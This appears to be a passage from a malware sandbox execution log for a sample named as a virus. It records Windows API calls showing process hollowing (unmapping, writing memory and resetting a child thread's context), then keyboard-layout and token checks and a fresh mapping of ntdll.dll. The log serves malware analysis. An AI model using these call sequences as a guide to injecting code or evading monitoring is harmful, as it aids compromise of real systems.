[430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0075.634] ReadProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x18e7c8, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e7c8*, lpNumberOfBytesRead=0x0) returned 1 [0075.635] NtUnmapViewOfSection (ProcessHandle=0x7c, BaseAddress=0x400000) returned 0x0 [0075.663] VirtualAllocEx (hProcess=0x7c, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0075.664] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x400000, Buffer=0x315a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x315a0*, NumberOfBytesWritten=0x0) returned 0x0 [0075.666] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x401000, Buffer=0x317a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x317a0*, NumberOfBytesWritten=0x0) returned 0x0 [0075.669] WriteProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x31654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x31654*, lpNumberOfBytesWritten=0x0) returned 1 [0075.670] SetThreadContext (hThread=0x78, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0075.670] ResumeThread (hThread=0x78) returned 0x1 [0075.670] CloseHandle (hObject=0x78) returned 1 [0075.670] CloseHandle (hObject=0x7c) returned 1 [0075.670] ExitProcess (uExitCode=0x0) [0075.671] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6107d0 | out: hHeap=0x610000) returned 1 Process: id = "2" image_name = "eb023c854d3c8a24589e9294fd5d346e.virus.exe" filename = "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" page_root = "0x483a4000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe98" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 322 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 323 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 324 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 325 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x403410 region_type = mapped_file name = "eb023c854d3c8a24589e9294fd5d346e.virus.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe") Region: id = 326 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 327 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 328 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 329 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 330 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 331 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 332 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 333 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 334 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 335 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 336 start_va = 0x2a0000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 337 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 338 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 339 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 340 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 341 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 342 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 343 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 344 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 345 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 346 start_va = 0x410000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 347 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 348 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 349 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 350 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 351 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 352 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 353 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 354 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 355 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 356 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 357 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 358 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 359 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 360 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 361 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 362 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 363 start_va = 0x520000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 364 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 365 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 366 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 367 start_va = 0x650000 end_va = 0x7d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 368 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 369 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 370 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 371 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 372 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 373 start_va = 0x7e0000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 374 start_va = 0x970000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 375 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 376 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 377 start_va = 0x1d70000 end_va = 0x1eeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 378 start_va = 0x210000 end_va = 0x215fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 379 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 817 start_va = 0x230000 end_va = 0x245fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Thread: id = 2 os_tid = 0xebc [0075.885] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0075.885] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0075.885] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0075.885] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0075.957] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0075.957] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0075.957] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0075.957] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0079.234] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0079.234] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x410a50 [0079.234] GetKeyboardLayoutList (in: nBuff=1, lpList=0x410a50 | out: lpList=0x410a50) returned 1 [0079.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0079.235] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0079.235] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0079.236] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0079.295] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0079.295] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1d70000 [0079.298] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: 